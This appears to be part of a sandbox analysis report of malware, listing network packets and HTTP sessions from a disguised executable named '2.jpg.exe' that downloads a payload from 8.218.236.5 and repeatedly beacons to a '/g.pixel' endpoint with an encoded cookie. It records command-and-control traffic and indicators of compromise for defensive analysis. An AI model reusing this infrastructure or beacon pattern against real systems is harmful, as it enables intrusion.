Apr 19, 2024 09:53:51.098727942 CEST	50032	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:51.413325071 CEST	8062	50032	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:51.415112019 CEST	8062	50032	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:51.415152073 CEST	8062	50032	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:51.415167093 CEST	50032	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:51.415218115 CEST	50032	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:51.415281057 CEST	50032	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:51.532752991 CEST	50033	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:51.729945898 CEST	8062	50032	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:51.853743076 CEST	8062	50033	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:51.856632948 CEST	50033	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:51.856956959 CEST	50033	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:52.177723885 CEST	8062	50033	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:52.179464102 CEST	8062	50033	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:52.179505110 CEST	8062	50033	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:52.179662943 CEST	50033	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:52.179662943 CEST	50033	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:52.179749966 CEST	50033	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:52.284611940 CEST	50034	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:52.500518084 CEST	8062	50033	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:52.600173950 CEST	8062	50034	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:52.601517916 CEST	50034	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:52.601869106 CEST	50034	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:52.918024063 CEST	8062	50034	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:52.922900915 CEST	8062	50034	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:52.922943115 CEST	8062	50034	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:52.923083067 CEST	50034	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:52.923084021 CEST	50034	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:52.923227072 CEST	50034	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:53.035370111 CEST	50035	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:53.238434076 CEST	8062	50034	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:53.353585958 CEST	8062	50035	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:53.353813887 CEST	50035	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:53.353899956 CEST	50035	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:53.672308922 CEST	8062	50035	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:53.674177885 CEST	8062	50035	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:53.674221039 CEST	8062	50035	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:53.674381971 CEST	50035	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:53.674381971 CEST	50035	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:53.674381971 CEST	50035	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:53.785582066 CEST	50036	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:53.993964911 CEST	8062	50035	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:54.107480049 CEST	8062	50036	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:54.107635021 CEST	50036	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:54.107842922 CEST	50036	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:54.429147959 CEST	8062	50036	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:54.431200027 CEST	8062	50036	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:54.431240082 CEST	8062	50036	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:54.431386948 CEST	50036	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:54.431967020 CEST	50036	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:54.550467014 CEST	50037	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:54.753290892 CEST	8062	50036	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:54.874495983 CEST	8062	50037	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:54.874573946 CEST	50037	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:54.874789953 CEST	50037	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:55.198615074 CEST	8062	50037	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:55.200551987 CEST	8062	50037	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:55.200607061 CEST	50037	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:55.200614929 CEST	8062	50037	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:55.200659990 CEST	50037	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:55.200759888 CEST	50037	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:55.315536022 CEST	50038	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:55.524554014 CEST	8062	50037	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:55.635929108 CEST	8062	50038	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:55.636111975 CEST	50038	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:55.636277914 CEST	50038	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:55.956710100 CEST	8062	50038	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:55.958601952 CEST	8062	50038	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:55.958645105 CEST	8062	50038	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:55.959033012 CEST	50038	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:55.959250927 CEST	50038	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:56.073966026 CEST	50039	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:56.279524088 CEST	8062	50038	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:56.414282084 CEST	8062	50039	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:56.416644096 CEST	50039	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:56.416897058 CEST	50039	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:56.757190943 CEST	8062	50039	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:56.759047985 CEST	8062	50039	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:56.759089947 CEST	8062	50039	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:56.759110928 CEST	50039	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:56.759166956 CEST	50039	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:56.759308100 CEST	50039	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:56.906039953 CEST	50040	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:57.099592924 CEST	8062	50039	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:57.236274958 CEST	8062	50040	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:57.236493111 CEST	50040	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:57.236605883 CEST	50040	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:57.566831112 CEST	8062	50040	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:57.568636894 CEST	8062	50040	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:57.568680048 CEST	8062	50040	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:57.568707943 CEST	50040	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:57.568800926 CEST	50040	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:57.568834066 CEST	50040	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:57.673402071 CEST	50041	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:57.898880005 CEST	8062	50040	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:57.994326115 CEST	8062	50041	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:57.994625092 CEST	50041	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:57.994777918 CEST	50041	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:58.315782070 CEST	8062	50041	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:58.318263054 CEST	8062	50041	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:58.318280935 CEST	8062	50041	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:58.318510056 CEST	50041	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:58.318553925 CEST	50041	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:58.424812078 CEST	50042	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:58.639180899 CEST	8062	50041	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:58.766000986 CEST	8062	50042	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:58.766097069 CEST	50042	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:58.766441107 CEST	50042	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:59.107557058 CEST	8062	50042	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:59.109419107 CEST	8062	50042	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:59.109436035 CEST	8062	50042	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:59.109474897 CEST	50042	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:59.109534025 CEST	50042	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:59.109692097 CEST	50042	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:59.221314907 CEST	50043	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:59.450683117 CEST	8062	50042	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:59.545238018 CEST	8062	50043	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:59.545342922 CEST	50043	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:59.545480013 CEST	50043	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:59.869312048 CEST	8062	50043	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:59.871138096 CEST	8062	50043	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:59.871177912 CEST	8062	50043	8.218.236.5	192.168.2.4
Apr 19, 2024 09:53:59.874596119 CEST	50043	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:59.874785900 CEST	50043	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:53:59.985802889 CEST	50044	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:00.199210882 CEST	8062	50043	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:00.296231031 CEST	8062	50044	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:00.296396017 CEST	50044	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:00.296542883 CEST	50044	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:00.606739044 CEST	8062	50044	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:00.608707905 CEST	8062	50044	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:00.608726978 CEST	8062	50044	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:00.608817101 CEST	50044	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:00.608818054 CEST	50044	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:00.608907938 CEST	50044	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:00.720073938 CEST	50045	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:00.919275999 CEST	8062	50044	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:01.041788101 CEST	8062	50045	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:01.041874886 CEST	50045	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:01.042745113 CEST	50045	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:01.364242077 CEST	8062	50045	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:01.366205931 CEST	8062	50045	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:01.366245985 CEST	8062	50045	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:01.366270065 CEST	50045	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:01.366328955 CEST	50045	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:01.366516113 CEST	50045	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:01.472075939 CEST	50046	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:01.687961102 CEST	8062	50045	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:01.802373886 CEST	8062	50046	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:01.806704044 CEST	50046	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:01.806704044 CEST	50046	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:02.137048960 CEST	8062	50046	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:02.138995886 CEST	8062	50046	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:02.139035940 CEST	8062	50046	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:02.139086008 CEST	50046	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:02.139156103 CEST	50046	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:02.139313936 CEST	50046	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:02.252420902 CEST	50047	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:02.469850063 CEST	8062	50046	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:02.568361998 CEST	8062	50047	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:02.568500996 CEST	50047	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:02.568844080 CEST	50047	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:02.884593964 CEST	8062	50047	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:02.886373043 CEST	8062	50047	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:02.886414051 CEST	8062	50047	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:02.886432886 CEST	50047	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:02.886461973 CEST	50047	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:02.886565924 CEST	50047	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:03.002260923 CEST	50048	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:03.202080965 CEST	8062	50047	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:03.323707104 CEST	8062	50048	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:03.323920012 CEST	50048	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:03.324182987 CEST	50048	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:03.645668030 CEST	8062	50048	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:03.647649050 CEST	8062	50048	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:03.647686005 CEST	8062	50048	8.218.236.5	192.168.2.4
Apr 19, 2024 09:54:03.647774935 CEST	50048	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:03.647774935 CEST	50048	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:04.019740105 CEST	50048	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:54:04.341486931 CEST	8062	50048	8.218.236.5	192.168.2.4

HTTP Request Dependency Graph

8.218.236.5:8089

8.218.236.5:8062

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	8.218.236.5	8089	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:49:58.932440996 CEST	71	OUT	GET /0.txt HTTP/1.1 Host: 8.218.236.5:8089 Connection: Keep-Alive
Apr 19, 2024 09:49:59.251029015 CEST	188	IN	HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/3.6.8 Date: Fri, 19 Apr 2024 07:49:59 GMT Content-type: text/plain Content-Length: 10240 Last-Modified: Fri, 19 Apr 2024 06:44:46 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	8.218.236.5	8089	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:49:59.632394075 CEST	71	OUT	GET /1.txt HTTP/1.1 Host: 8.218.236.5:8089 Connection: Keep-Alive
Apr 19, 2024 09:49:59.950258017 CEST	187	IN	HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/3.6.8 Date: Fri, 19 Apr 2024 07:49:59 GMT Content-type: text/plain Content-Length: 1474 Last-Modified: Fri, 19 Apr 2024 05:33:14 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:00.411428928 CEST	190	OUT	GET /j9sF HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; MALC) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:00.735272884 CEST	120	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:00 GMT Content-Type: application/octet-stream Content-Length: 223293

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:02.369143963 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:02.692931890 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:03.124784946 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:03.450352907 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:03 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:03.905308008 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:04.247220039 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:04.689816952 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:05.013215065 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:05.454150915 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:05.782332897 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49738	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:06.242471933 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:06.593633890 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:06 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49739	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:07.038625956 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:07.352713108 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49740	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:07.803215027 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:08.127300024 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49741	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:08.554764032 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:08.876497984 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49742	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:09.321549892 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:09.658212900 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49743	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:10.086076021 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:10.406213045 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:10 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
